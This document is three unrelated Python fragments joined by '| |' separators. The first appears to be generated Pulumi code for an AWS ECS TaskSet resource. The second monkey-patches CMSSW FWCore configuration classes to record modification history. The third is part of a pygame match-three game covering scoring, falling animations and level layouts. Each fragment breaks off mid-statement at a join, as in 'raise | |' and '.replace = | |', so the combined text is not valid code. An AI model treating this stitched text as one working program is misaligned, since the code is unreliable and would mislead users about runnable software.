pulumi.set(__self__, "load_balancers", load_balancers)
if network_configuration is not None:
pulumi.set(__self__, "network_configuration", network_configuration)
if platform_version is not None:
pulumi.set(__self__, "platform_version", platform_version)
if scale is not None:
pulumi.set(__self__, "scale", scale)
if service_registries is not None:
pulumi.set(__self__, "service_registries", service_registries)
@property
@pulumi.getter
def cluster(self) -> pulumi.Input[str]:
"""
The short name or full Amazon Resource Name (ARN) of the cluster that hosts the service to create the task set in.
"""
return pulumi.get(self, "cluster")
@cluster.setter
def cluster(self, value: pulumi.Input[str]):
pulumi.set(self, "cluster", value)
@property
@pulumi.getter
def service(self) -> pulumi.Input[str]:
"""
The short name or full Amazon Resource Name (ARN) of the service to create the task set in.
"""
return pulumi.get(self, "service")
@service.setter
def service(self, value: pulumi.Input[str]):
pulumi.set(self, "service", value)
@property
@pulumi.getter(name="taskDefinition")
def task_definition(self) -> pulumi.Input[str]:
"""
The short name or full Amazon Resource Name (ARN) of the task definition for the tasks in the task set to use.
"""
return pulumi.get(self, "task_definition")
@task_definition.setter
def task_definition(self, value: pulumi.Input[str]):
pulumi.set(self, "task_definition", value)
@property
@pulumi.getter(name="externalId")
def external_id(self) -> Optional[pulumi.Input[str]]:
"""
An optional non-unique tag that identifies this task set in external systems. If the task set is associated with a service discovery registry, the tasks in this task set will have the ECS_TASK_SET_EXTERNAL_ID AWS Cloud Map attribute set to the provided value.
"""
return pulumi.get(self, "external_id")
@external_id.setter
def external_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "external_id", value)
@property
@pulumi.getter(name="launchType")
def launch_type(self) -> Optional[pulumi.Input['TaskSetLaunchType']]:
"""
The launch type that new tasks in the task set will use. For more information, see https://docs.aws.amazon.com/AmazonECS/latest/developerguide/launch_types.html in the Amazon Elastic Container Service Developer Guide.
"""
return pulumi.get(self, "launch_type")
@launch_type.setter
def launch_type(self, value: Optional[pulumi.Input['TaskSetLaunchType']]):
pulumi.set(self, "launch_type", value)
@property
@pulumi.getter(name="loadBalancers")
def load_balancers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['TaskSetLoadBalancerArgs']]]]:
return pulumi.get(self, "load_balancers")
@load_balancers.setter
def load_balancers(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['TaskSetLoadBalancerArgs']]]]):
pulumi.set(self, "load_balancers", value)
@property
@pulumi.getter(name="networkConfiguration")
def network_configuration(self) -> Optional[pulumi.Input['TaskSetNetworkConfigurationArgs']]:
return pulumi.get(self, "network_configuration")
@network_configuration.setter
def network_configuration(self, value: Optional[pulumi.Input['TaskSetNetworkConfigurationArgs']]):
pulumi.set(self, "network_configuration", value)
@property
@pulumi.getter(name="platformVersion")
def platform_version(self) -> Optional[pulumi.Input[str]]:
"""
The platform version that the tasks in the task set should use. A platform version is specified only for tasks using the Fargate launch type. If one isn't specified, the LATEST platform version is used by default.
"""
return pulumi.get(self, "platform_version")
@platform_version.setter
def platform_version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "platform_version", value)
@property
@pulumi.getter
def scale(self) -> Optional[pulumi.Input['TaskSetScaleArgs']]:
"""
A floating-point percentage of the desired number of tasks to place and keep running in the task set.
"""
return pulumi.get(self, "scale")
@scale.setter
def scale(self, value: Optional[pulumi.Input['TaskSetScaleArgs']]):
pulumi.set(self, "scale", value)
@property
@pulumi.getter(name="serviceRegistries")
def service_registries(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['TaskSetServiceRegistryArgs']]]]:
"""
The details of the service discovery registries to assign to this task set. For more information, see https://docs.aws.amazon.com/AmazonECS/latest/developerguide/service-discovery.html.
"""
return pulumi.get(self, "service_registries")
@service_registries.setter
def service_registries(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['TaskSetServiceRegistryArgs']]]]):
pulumi.set(self, "service_registries", value)
class TaskSet(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
cluster: Optional[pulumi.Input[str]] = None,
external_id: Optional[pulumi.Input[str]] = None,
launch_type: Optional[pulumi.Input['TaskSetLaunchType']] = None,
load_balancers: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TaskSetLoadBalancerArgs']]]]] = None,
network_configuration: Optional[pulumi.Input[pulumi.InputType['TaskSetNetworkConfigurationArgs']]] = None,
platform_version: Optional[pulumi.Input[str]] = None,
scale: Optional[pulumi.Input[pulumi.InputType['TaskSetScaleArgs']]] = None,
service: Optional[pulumi.Input[str]] = None,
service_registries: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TaskSetServiceRegistryArgs']]]]] = None,
task_definition: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Create a task set in the specified cluster and service. This is used when a service uses the EXTERNAL deployment controller type. For more information, see https://docs.aws.amazon.com/AmazonECS/latest/developerguide/deployment-types.htmlin the Amazon Elastic Container Service Developer Guide.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] cluster: The short name or full Amazon Resource Name (ARN) of the cluster that hosts the service to create the task set in.
:param pulumi.Input[str] external_id: An optional non-unique tag that identifies this task set in external systems. If the task set is associated with a service discovery registry, the tasks in this task set will have the ECS_TASK_SET_EXTERNAL_ID AWS Cloud Map attribute set to the provided value.
:param pulumi.Input['TaskSetLaunchType'] launch_type: The launch type that new tasks in the task set will use. For more information, see https://docs.aws.amazon.com/AmazonECS/latest/developerguide/launch_types.html in the Amazon Elastic Container Service Developer Guide.
:param pulumi.Input[str] platform_version: The platform version that the tasks in the task set should use. A platform version is specified only for tasks using the Fargate launch type. If one isn't specified, the LATEST platform version is used by default.
:param pulumi.Input[pulumi.InputType['TaskSetScaleArgs']] scale: A floating-point percentage of the desired number of tasks to place and keep running in the task set.
:param pulumi.Input[str] service: The short name or full Amazon Resource Name (ARN) of the service to create the task set in.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TaskSetServiceRegistryArgs']]]] service_registries: The details of the service discovery registries to assign to this task set. For more information, see https://docs.aws.amazon.com/AmazonECS/latest/developerguide/service-discovery.html.
:param pulumi.Input[str] task_definition: The short name or full Amazon Resource Name (ARN) of the task definition for the tasks in the task set to use.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: TaskSetArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Create a task set in the specified cluster and service. This is used when a service uses the EXTERNAL deployment controller type. For more information, see https://docs.aws.amazon.com/AmazonECS/latest/developerguide/deployment-types.htmlin the Amazon Elastic Container Service Developer Guide.
:param str resource_name: The name of the resource.
:param TaskSetArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(TaskSetArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
cluster: Optional[pulumi.Input[str]] = None,
external_id: Optional[pulumi.Input[str]] = None,
launch_type: Optional[pulumi.Input['TaskSetLaunchType']] = None,
load_balancers: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TaskSetLoadBalancerArgs']]]]] = None,
network_configuration: Optional[pulumi.Input[pulumi.InputType['TaskSetNetworkConfigurationArgs']]] = None,
platform_version: Optional[pulumi.Input[str]] = None,
scale: Optional[pulumi.Input[pulumi.InputType['TaskSetScaleArgs']]] = None,
service: Optional[pulumi.Input[str]] = None,
service_registries: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TaskSetServiceRegistryArgs']]]]] = None,
task_definition: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise | |
from copy import deepcopy
import inspect
ACTIVATE_INSPECTION=True
#### helpers for inspection ####
def auto_inspect():
if not ACTIVATE_INSPECTION:
return [("unknown","unknown","unknown")]
stack = inspect.stack()
while len(stack)>=1 and len(stack[0])>=2 and ('FWCore/ParameterSet' in stack[0][1] or 'FWCore/GuiBrowsers' in stack[0][1]):
stack = stack[1:]
if len(stack)>=1 and len(stack[0])>=3:
return stack
else:
return [("unknown","unknown","unknown")]
#### patches needed for deepcopy of process ####
import FWCore.ParameterSet.DictTypes as typ
def new_SortedKeysDict__copy__(self):
return self.__class__(self)
typ.SortedKeysDict.__copy__ = new_SortedKeysDict__copy__
def new_SortedKeysDict__deepcopy__(self, memo=None):
from copy import deepcopy
if memo is None:
memo = {}
d = memo.get(id(self), None)
if d is not None:
return d
memo[id(self)] = d = self.__class__()
d.__init__(deepcopy(self.items(), memo))
return d
typ.SortedKeysDict.__deepcopy__ = new_SortedKeysDict__deepcopy__
#### process history ####
import FWCore.ParameterSet.Config as cms
def new___init__(self,name):
self.old___init__(name)
self.__dict__['_Process__history'] = []
self.__dict__['_Process__enableRecording'] = 0
self.__dict__['_Process__modifiedobjects'] = []
self.__dict__['_Process__modifiedcheckpoint'] = None
self.__dict__['_Process__modifications'] = []
cms.Process.old___init__=cms.Process.__init__
cms.Process.__init__=new___init__
def new_modifiedObjects(self):
return self.__dict__['_Process__modifiedobjects']
cms.Process.modifiedObjects=new_modifiedObjects
def new_resetModifiedObjects(self):
self.__dict__['_Process__modifiedobjects'] = []
cms.Process.resetModifiedObjects=new_resetModifiedObjects
def new__place(self, name, mod, d):
self.old__place(name, mod, d)
if self._okToPlace(name, mod, d):
self.__dict__['_Process__modifiedobjects'].append(mod)
cms.Process.old__place=cms.Process._place
cms.Process._place=new__place
def new__placeSource(self, name, mod):
self.old__placeSource(name, mod)
self.__dict__['_Process__modifiedobjects'].append(mod)
cms.Process.old__placeSource=cms.Process._placeSource
cms.Process._placeSource=new__placeSource
def new__placeLooper(self, name, mod):
self.old__placeLooper(name, mod)
self.__dict__['_Process__modifiedobjects'].append(mod)
cms.Process.old__placeLooper=cms.Process._placeLooper
cms.Process._placeLooper=new__placeLooper
def new__placeService(self, typeName, mod):
self.old__placeService(typeName, mod)
self.__dict__['_Process__modifiedobjects'].append(mod)
cms.Process.old__placeService=cms.Process._placeService
cms.Process._placeService=new__placeService
def new_setSchedule_(self, sch):
self.old_setSchedule_(sch)
self.__dict__['_Process__modifiedobjects'].append(sch)
cms.Process.old_setSchedule_=cms.Process.setSchedule_
cms.Process.setSchedule_=new_setSchedule_
def new_setLooper_(self, lpr):
self.old_setLooper_(lpr)
self.__dict__['_Process__modifiedobjects'].append(lpr)
cms.Process.old_setLooper_=cms.Process.setLooper_
cms.Process.setLooper_=new_setLooper_
def new_history(self, removeDuplicates=False):
return self.__dict__['_Process__history']+self.dumpModificationsWithObjects(removeDuplicates)
cms.Process.history=new_history
def new_resetHistory(self):
self.__dict__['_Process__history'] = []
self.resetModified()
self.resetModifiedObjects()
cms.Process.resetHistory=new_resetHistory
def new_dumpHistory(self,withImports=True):
dumpHistory=[]
for item,objects in self.history():
if isinstance(item,(str,unicode)):
dumpHistory.append(item +"\n")
else: # isTool
print item
dump=item.dumpPython()
if isinstance(dump,tuple):
if withImports and dump[0] not in dumpHistory:
dumpHistory.append(dump[0])
dumpHistory.append(dump[1] +"\n")
else:
dumpHistory.append(dump +"\n")
return ''.join(dumpHistory)
cms.Process.dumpHistory=new_dumpHistory
def new_addAction(self,tool):
if self.__dict__['_Process__enableRecording'] == 0:
modifiedObjects=self.modifiedObjects()
for m,o in self.dumpModificationsWithObjects():
modifiedObjects+=o
self.__dict__['_Process__history'].append((tool,modifiedObjects))
self.resetModified()
self.resetModifiedObjects()
cms.Process.addAction=new_addAction
def new_deleteAction(self,i):
del self.__dict__['_Process__history'][i]
cms.Process.deleteAction=new_deleteAction
def new_disableRecording(self):
if self.__dict__['_Process__enableRecording'] == 0:
# remember modifications in history
self.__dict__['_Process__history']+=self.dumpModificationsWithObjects()
self.resetModified()
self.resetModifiedObjects()
self.__dict__['_Process__enableRecording'] += 1
cms.Process.disableRecording=new_disableRecording
def new_enableRecording(self):
self.__dict__['_Process__enableRecording'] -= 1
cms.Process.enableRecording=new_enableRecording
def new_checkRecording(self):
return self.__dict__['_Process__enableRecording']==0
cms.Process.checkRecording=new_checkRecording
def new_setattr(self, name, value):
"""
This catches modifications that occur during process.load,
and only records a modification if there was an existing object
and the version after __setattr__ has a different id().
This does not mean that the object is different, only redefined.
We still really need a recursive-comparison function for parameterizeable
objects to determine if a real change has been made.
"""
old = None
existing = False
if not name.startswith('_Process__'):
existing = hasattr(self, name)
if existing:
old = getattr(self, name)
self.old__setattr__(name, value)
if existing:
if id(getattr(self, name)) != id(old):
stack = auto_inspect()
self.__dict__['_Process__modifications'] += [{'name': name,
'old': deepcopy(old),
'new': deepcopy(getattr(self, name)),
'file':stack[0][1],'line':stack[0][2],
'action': 'replace'}]
cms.Process.old__setattr__ = cms.Process.__setattr__
cms.Process.__setattr__ = new_setattr
def new_recurseResetModified_(self, o):
"""
Empty all the _modifications lists for
all objects beneath this one.
"""
properties = []
if isinstance(o, cms._ModuleSequenceType):
o.resetModified()
if isinstance(o, cms._Parameterizable):
o.resetModified()
for key in o.parameterNames_():
value = getattr(o,key)
self.recurseResetModified_(value)
if isinstance(o, cms._ValidatingListBase):
for index,item in enumerate(o):
self.recurseResetModified_(item)
cms.Process.recurseResetModified_=new_recurseResetModified_
def new_recurseDumpModifications_(self, name, o):
"""
Recursively return a standardised list of modifications
from the object hierarchy.
"""
modifications = []
if isinstance(o, cms._ModuleSequenceType):
if o._isModified:
for mod in o._modifications:
modifications.append({'name':name,
'action':mod['action'],
'old': mod['old'],
'new': mod['new'],
'file': mod['file'],
'line': mod['line'],
'dump': o.dumpPython({}),
'type': 'seq'})
if isinstance(o, cms._Parameterizable):
for mod in o._modifications:
paramname = mod['name']
if hasattr(o, paramname):
paramvalue = getattr(o, paramname)
else:
paramvalue = None
if isinstance(paramvalue,cms._ParameterTypeBase):
dump = paramvalue.dumpPython()
else:
dump = paramvalue
modifications.append({'name': '%s.%s' %(name, paramname),
'old': mod['old'],
'new': mod['new'],
'file': mod['file'],
'line': mod['line'],
'action': mod['action'],
'dump': dump,
'type': 'param'})
# Loop over any child elements
for key in o.parameterNames_():
value = getattr(o,key)
modifications += self.recurseDumpModifications_("%s.%s" % (name, key), value)
if isinstance(o, cms._ValidatingListBase):
for index, item in enumerate(o):
modifications += self.recurseDumpModifications_("%s[%s]" % (name, index), item)
if isinstance(o, cms.Process):
for mod in o.__dict__['_Process__modifications']:
if hasattr(o, mod['name']) and hasattr(getattr(o, mod['name']), 'dumpPython'):
dump = getattr(o, mod['name']).dumpPython()
else:
dump = None
modifications.append({'name': mod['name'],
'action': mod['action'],
'old': mod['old'],
'new': mod['new'],
'dump': dump,
'file': mod['file'],
'line': mod['line'],
'type': 'process'})
return modifications
cms.Process.recurseDumpModifications_=new_recurseDumpModifications_
def new_modificationCheckpoint(self):
"""
Set a checkpoint, ie get the current list of all known
top-level names and store them. Later, when we print out
modifications we ignore any modifications that do not affect
something in this list.
There is currently no way of clearing this, but I think this
is generally a use-once feature.
"""
existing_names = set()
for item in self.items_():
existing_names.add(item[0])
self.__dict__['_Process__modifiedcheckpoint'] = list(existing_names)
cms.Process.modificationCheckpoint=new_modificationCheckpoint
def new_resetModified(self):
"""
Empty out all the modification lists, so we only see changes that
happen from now onwards.
"""
self.__dict__['_Process__modified'] = []
for name, o in self.items_():
self.recurseResetModified_(o)
cms.Process.resetModified=new_resetModified
def new_dumpModifications(self, comments=True, process=True, module=False, sequence=True, value=True, sort=True, group=True):
"""
Return some text describing all the modifications that have been made.
* comments: print out comments describing the file and line which triggered
the modification, if determined.
* process: print "process." in front of every name
* module: only print out one entry per top-level module that has been
changed, rather than the details
* sequence: include changes to sequences
* value: print out the latest value of each name
* sort: whether to sort all the names before printing (otherwise they're in
more-or-less time order, within each category)
"""
modifications = self.recurseDumpModifications_('', self)
text = []
for name, o in self.items_():
modifications += self.recurseDumpModifications_(name, o)
if not sequence:
modifications = filter(lambda x: not x['type'] == 'seq', modifications)
checkpoint = self.__dict__['_Process__modifiedcheckpoint']
if not checkpoint == None:
modifications = filter(lambda x: any([x['name'].startswith(check) for check in checkpoint]), modifications)
if module:
value = False
comments = False
modules = list(set([m['name'].split('.')[0] for m in modifications]))
if sort:
modules = sorted(modules)
if process:
text = ['process.%s' % m for m in modules]
else:
text = modules
else:
if sort:
modifications = sorted(modifications, key=lambda x: x['name'])
for i, m in enumerate(modifications):
t = ''
if comments:
if m['action'] == 'replace':
t += '# %(file)s:%(line)s replace %(old)s->%(new)s\n' % m
elif m['action'] == 'remove':
t += '# %(file)s:%(line)s remove %(old)s\n' % m
elif m['action'] == 'append':
t += '# %(file)s:%(line)s append %(new)s\n' % m
if not group or i==len(modifications)-1 or not modifications[i+1]['name'] == m['name']:
if process and value:
t += 'process.%s = %s' % (m['name'], m['dump'])
elif value:
t += '%s = %s' % (m['name'], m['dump'])
elif process:
t += 'process.%s' % (m['name'])
else:
t += '%s' % (m['name'])
text += [t]
return '\n'.join(text)+'\n'
cms.Process.dumpModifications=new_dumpModifications
def new_dumpModificationsWithObjects(self, removeDuplicates=False):
modifications = []
last_modification=""
for name, o in self.items_():
for m in self.recurseDumpModifications_(name, o):
# remove duplicate modifications
if removeDuplicates and last_modification==m['name']:
modifications.pop()
last_modification=m['name']
# add changes
text = 'process.%s = %s' % (m['name'], m['dump'])
modifications += [(text,[o])]
return modifications
cms.Process.dumpModificationsWithObjects=new_dumpModificationsWithObjects
def new_moduleItems_(self):
items = []
items += self.producers.items()
items += self.filters.items()
items += self.analyzers.items()
return tuple(items)
cms.Process.moduleItems_=new_moduleItems_
def new_items_(self):
items = []
if self.source:
items += [("source", self.source)]
if self.looper:
items += [("looper", self.looper)]
items += self.moduleItems_()
items += self.outputModules.items()
items += self.sequences.items()
items += self.paths.iteritems()
items += self.endpaths.items()
items += self.services.items()
items += self.es_producers.items()
items += self.es_sources.items()
items += self.es_prefers.items()
items += self.psets.items()
items += self.vpsets.items()
if self.schedule:
items += [("schedule", self.schedule)]
return tuple(items)
cms.Process.items_=new_items_
#### parameterizable history ####
def new_Parameterizable_init(self,*a,**k):
self.__dict__['_modifications'] = []
self.old__init__(*a,**k)
self._modifications = []
cms._Parameterizable.old__init__ = cms._Parameterizable.__init__
cms._Parameterizable.__init__ = new_Parameterizable_init
def new_Parameterizable_addParameter(self, name, value):
self.old__addParameter(name,value)
stack = auto_inspect()
self._modifications.append({'file':stack[0][1],'line':stack[0][2],'name':name,'old':None,'new':deepcopy(value),'action':'add'})
cms._Parameterizable.old__addParameter = cms._Parameterizable._Parameterizable__addParameter
cms._Parameterizable._Parameterizable__addParameter = new_Parameterizable_addParameter
def new_Parameterizable_setattr(self, name, value):
if (not self.isFrozen()) and (not name.startswith('_')) and (name in self.__dict__):
stack = auto_inspect()
self._modifications.append({'file':stack[0][1],'line':stack[0][2],'name':name,'old':deepcopy(self.__dict__[name]),'new':deepcopy(value),'action':'replace'})
self._isModified = True
self.old__setattr__(name,value)
cms._Parameterizable.old__setattr__ = cms._Parameterizable.__setattr__
cms._Parameterizable.__setattr__ = new_Parameterizable_setattr
def new_Parameterizeable_delattr(self, name):
if not self.isFrozen():
stack = auto_inspect()
self._modifications.append({'file':stack[0][1],'line':stack[0][2],'name':name,'old':deepcopy(self.__dict__[name]), 'new':None,'action':'delete'})
self.old__delattr__(name)
cms._Parameterizable.old__delattr__ = cms._Parameterizable.__delattr__
cms._Parameterizable.__delattr__ = new_Parameterizeable_delattr
def new_Parameterizable_resetModified(self):
self._isModified=False
self._modifications = []
for name in self.parameterNames_():
param = self.__dict__[name]
if isinstance(param, cms._Parameterizable):
param.resetModified()
cms._Parameterizable.resetModified = new_Parameterizable_resetModified
def new_ParameterTypeBase_resetModified(self):
self._isModified=False
self._modifications = []
cms._ParameterTypeBase.resetModified = new_ParameterTypeBase_resetModified
#### sequence history ####
def new__Sequenceable_name(self):
return ''
cms._Sequenceable._name_ = new__Sequenceable_name
try:
# for backwards-compatibility with CMSSW_3_10_X
from FWCore.ParameterSet.SequenceTypes import _SequenceOperator
def new__SequenceOperator_name(self):
return str(self._left._name_())+str(self._pySymbol)+str(self._right._name_())
_SequenceOperator._name_ = new__SequenceOperator_name
except:
pass
from FWCore.ParameterSet.SequenceTypes import _SequenceNegation, _SequenceIgnore, SequencePlaceholder
def new__SequencePlaceholder_name(self):
return self._name
SequencePlaceholder._name_ = new__SequencePlaceholder_name
def new__SequenceNegation_name(self):
if self._operand:
return '~'+str(self._operand._name_())
else:
return '~()'
_SequenceNegation._name_ = new__SequenceNegation_name
def new__SequenceIgnore_name(self):
if self._operand:
return '-'+str(self._operand._name_())
else:
return '-()'
_SequenceIgnore._name_ = new__SequenceIgnore_name
def new_Sequence_name(self):
if self._seq:
return '('+str(self._seq._name_())+')'
else:
return '()'
cms.Sequence._name_ = new_Sequence_name
def new__Module_name(self):
if hasattr(self,'_Labelable__label'):
return getattr(self,'_Labelable__label')
elif hasattr(self,'_TypedParameterizable__type'):
return 'unnamed(%s)'%getattr(self,'_TypedParameterizable__type')
return type(self).__name__
cms._Module._name_ = new__Module_name
def new__ModuleSequenceType__init__(self,*arg,**argv):
self._modifications = []
self.old__init__(*arg,**argv)
cms._ModuleSequenceType.old__init__ = cms._ModuleSequenceType.__init__
cms._ModuleSequenceType.__init__ = new__ModuleSequenceType__init__
def new__ModuleSequenceType_resetModified(self):
self._isModified=False
self._modifications = []
cms._ModuleSequenceType.resetModified = new__ModuleSequenceType_resetModified
def new__ModuleSequenceType_isModified(self):
return self._isModified
cms._ModuleSequenceType.isModified = new__ModuleSequenceType_isModified
def new__ModuleSequenceType_copy(self):
returnValue = cms._ModuleSequenceType.__new__(type(self))
returnValue.__init__(self._seq)
returnValue._isModified = self._isModified
returnValue._modifications = deepcopy(self._modifications)
return returnValue
cms._ModuleSequenceType.copy = new__ModuleSequenceType_copy
def new__ModuleSequenceType_replace(self, original, replacement):
stack = auto_inspect()
self._isModified=True
self._modifications.append({'file':stack[0][1],'line':stack[0][2],'action':'replace','old':original._name_(),'new':replacement._name_()})
return self.old_replace(original, replacement)
cms._ModuleSequenceType.old_replace = cms._ModuleSequenceType.replace
cms._ModuleSequenceType.replace = | |
elif self.exists_left(i+2, j, 3) and self.exists_right(i+2, j, 2):
self.animal_num[self.animal[i][j]] += 6
Sounds.eliminate(4) # Elimination sound 4
self.change_down(i, j, 3)
self.change_left(i+2, j, 3)
self.change_right(i+2, j, 2)
elif self.exists_left(i+2, j, 3) and self.exists_right(i+2, j, 3):
self.animal_num[self.animal[i][j]] += 7
Sounds.eliminate(5) # Elimination sound 5
self.change_down(i, j, 3)
self.change_left(i+2, j, 3)
self.change_right(i+2, j, 3)
else:
self.animal_num[self.animal[i][j]] += 3
Sounds.eliminate(1) # Elimination sound 1
self.change_down(i, j, 3)
self.fall_animal()
score_level = self.score - score_level # Score level
# Display & speak: good, great, amazing, excellent, unbelievable
if score_level < 5:
return self.value_swapped
if score_level < 8: # 5 good
Sounds.score_level(0)
Element(Element.score_level[0], (350, 250)).draw(self.screen)
pygame.display.flip()
delay(500)
elif score_level < 10: # 8 great
Sounds.score_level(1)
Element(Element.score_level[1], (350, 250)).draw(self.screen)
pygame.display.flip()
delay(500)
elif score_level < 15: # 10 amazing
Sounds.score_level(2)
Element(Element.score_level[2], (350, 250)).draw(self.screen)
pygame.display.flip()
delay(500)
elif score_level < 20: # 15 excellent
Sounds.score_level(3)
Element(Element.score_level[3], (350, 250)).draw(self.screen)
pygame.display.flip()
delay(500)
elif score_level >= 20: # 20 unbelievable
Sounds.score_level(4)
Element(Element.score_level[4], (350, 250)).draw(self.screen)
pygame.display.flip()
delay(500)
return self.value_swapped # Return the swap value sign
def fall_animal(self): # pylint: disable=too-many-locals
'''Animation of falling animals'''
clock = pygame.time.Clock()
position = []
ice_position = []
for i in range(self.row, self.row + self.height):
for j in range(self.col, self.col + self.width):
if self.animal[i][j] == -2:
x, y = self.rc_xy(i, j)
position.append((x, y))
if self.ice_list[i][j] == 1:
ice_position.append((x, y))
if position:
for index in range(0, 9):
clock.tick(20)
for pos in position:
self.draw_brick(pos[0], pos[1])
if pos in ice_position:
Element(Element.ice_format%index, (pos[0], pos[1])).draw(self.screen)
Element(Element.bling_format%index, (pos[0], pos[1])).draw(self.screen)
pygame.display.flip()
for i in range(self.row, self.row + self.height):
brick_position = []
fall_animal_list = []
speed = [0, 1]
for j in range(self.col, self.col + self.width):
if self.animal[i][j] == -2:
x, y = self.rc_xy(i, j)
if self.ice_list[i][j] == 1:
play_sound(Sounds.ICE_BREAKING)
self.ice_num += 1
self.ice_list[i][j] = -1
brick_position.append((x, y))
for m in range(i, self.row - 1, -1):
if self.animal[m - 1][j] != -1:
x, y = self.rc_xy(m - 1, j)
brick_position.append((x, y))
animal = Element(Element.animals[self.animal[m - 1][j]], (x, y))
fall_animal_list.append(animal)
self.animal[m][j] = self.animal[m - 1][j]
else:
self.animal[m][j] = randint(0, 5)
break
while speed != [0, 0] and fall_animal_list:
for position in brick_position:
self.draw_brick(position[0], position[1])
for animal_sprite in fall_animal_list:
animal_sprite.move(speed)
animal_sprite.draw(self.screen)
speed = animal_sprite.speed
pygame.display.flip()
def judge_next(self, tp, score):
'''Check whether the next level is reached or not'''
if tp == 1: # Passed
self.load_fns_window(score)
elif tp == -1: # Failed
self.load_fail_window()
def load_fail_window(self):
'''Display the failure board and buttons'''
sound_sign = 0
step_add = Board(Board.step_add, Board.button_position[0]) # L: 5 more steps
retry = Board(Board.replay, Board.button_position[1]) # R: Replay
self.screen.blit(self.fail_board.image, self.fail_board.rect) # Failure board
self.screen.blit(step_add.image, step_add.rect)
self.screen.blit(retry.image, retry.rect)
while self.fail_board.speed != [0, 0]:
self.draw()
self.screen.blit(self.fail_board.image, self.fail_board.rect)
self.fail_board.move()
pygame.display.flip()
if sound_sign == 0:
play_sound(Sounds.BOARD_SOUND)
sound_sign = 1
def load_fns_window(self, score):
'''Display the success board, score and buttons'''
sound_sign = 0
replay = Board(Board.replay, Board.button_position[0]) # L: Replay
self.screen.blit(self.success_board.image, self.success_board.rect) # Successful board
if self.level < 10: # If not the last level
next_level = Board(Board.next, Board.button_position[1]) # R: Next level
self.screen.blit(next_level.image, next_level.rect)
self.screen.blit(replay.image, replay.rect)
while self.success_board.speed != [0, 0]:
self.draw()
self.screen.blit(self.success_board.image, self.success_board.rect)
self.success_board.move()
pygame.display.flip()
if sound_sign == 0:
play_sound(Sounds.BOARD_SOUND)
sound_sign = 1
self.displayStars(score) # Display the stars
# Money
self.load_text(str(self.score*2), (Board.starts_position[0][0]+75, Board.starts_position[0][0]+46), 20, (0, 0, 0))
def displayStars(self, score):
'''Display the stars according to the score.'''
star1 = Board(Board.stars, Board.starts_position[0])
star2 = Board(Board.stars, Board.starts_position[1])
star3 = Board(Board.stars, Board.starts_position[2])
if 0 <= score < self.min:
self.load_text('1', (Board.starts_position[1][0]+48, Board.starts_position[1][1]+35), 20, (0, 0, 0))
self.screen.blit(star1.image, star1.rect)
elif self.min <= score <= self.max:
self.load_text('2', (Board.starts_position[1][0] + 48, Board.starts_position[1][1] + 35), 20, (0, 0, 0))
self.screen.blit(star1.image, star1.rect)
self.screen.blit(star2.image, star2.rect)
elif score > self.max:
self.load_text('5', (Board.starts_position[1][0] + 48, Board.starts_position[1][1] + 35), 20, (0, 0, 0))
self.screen.blit(star1.image, star1.rect)
self.screen.blit(star2.image, star2.rect)
self.screen.blit(star3.image, star3.rect)
pygame.display.flip()
def set_level_mode(self, level):
'''Set the level mode and its steps.'''
self.level = level
if self.reset_mode: # If it is required to reset the mode
self.num_sign = True
if level == 1:
self.__init__(7, 7)
self.animal[7][9] = self.animal[7][10] = self.animal[7][11] = self.animal[8][10] = self.animal[11][7] = \
self.animal[11][13] = self.animal[12][7] = self.animal[12][8] = self.animal[12][12] = self.animal[12][13] = \
self.animal[13][7] = self.animal[13][8] = self.animal[13][9] = self.animal[13][11] = self.animal[13][12] = \
self.animal[13][13] = -1
self.init_step = 17 # 17 initial steps
elif level == 2:
self.__init__(4, 8)
self.init_step = 16 # 16 initial steps
elif level == 3:
self.__init__(7, 7)
self.init_step = 18 # 18 initial steps
elif level == 4:
self.__init__(9, 7)
row, col = self.row, self.col
self.animal[row][col] = self.animal[row][col+7] = self.animal[row][col+8] = self.animal[row+1][col+8] = \
self.animal[row+5][col] = self.animal[row+6][col] = self.animal[row+6][col+1] = self.animal[row+6][col+8] = -1
self.init_step = 20
elif level == 5:
self.__init__(8, 9)
row, col = self.row, self.col
self.animal[row][col+7] = self.animal[row+2][col] = self.animal[row+5][col] = self.animal[row+3][col+7] = \
self.animal[row+6][col+7] = self.animal[row+8][col] = -1
self.init_step = 20
elif level == 6:
self.__init__(9, 9)
row, col = self.row, self.col
self.animal[row][col] = self.animal[row][col+8] = self.animal[row+2][col+4] = self.animal[row+3][col+2] = \
self.animal[row+3][col+6] = self.animal[row+8][col] = self.animal[row+8][col+8] = -1
for i in range(row+4, row+6):
for j in range(col+3, col+6):
self.animal[i][j] = -1
self.init_step = 28
elif level == 7:
self.__init__(9, 9)
row, col = self.row, self.col
for i in range(row, row + 9):
self.animal[i][col+4] = -1
for j in range(col, col+4):
self.animal[row+3][j] = -1
for j in range(col+5, col+9):
self.animal[row+5][j] = -1
self.init_step = 25
elif level == 8:
self.__init__(7, 8)
row, col = self.row, self.col
for i in range(row+2, row+5):
for j in range(col+1, col+6):
self.ice_list[i][j] = 1
self.init_step = 21
elif level == 9:
self.__init__(9, 9)
row, col = self.row, self.col
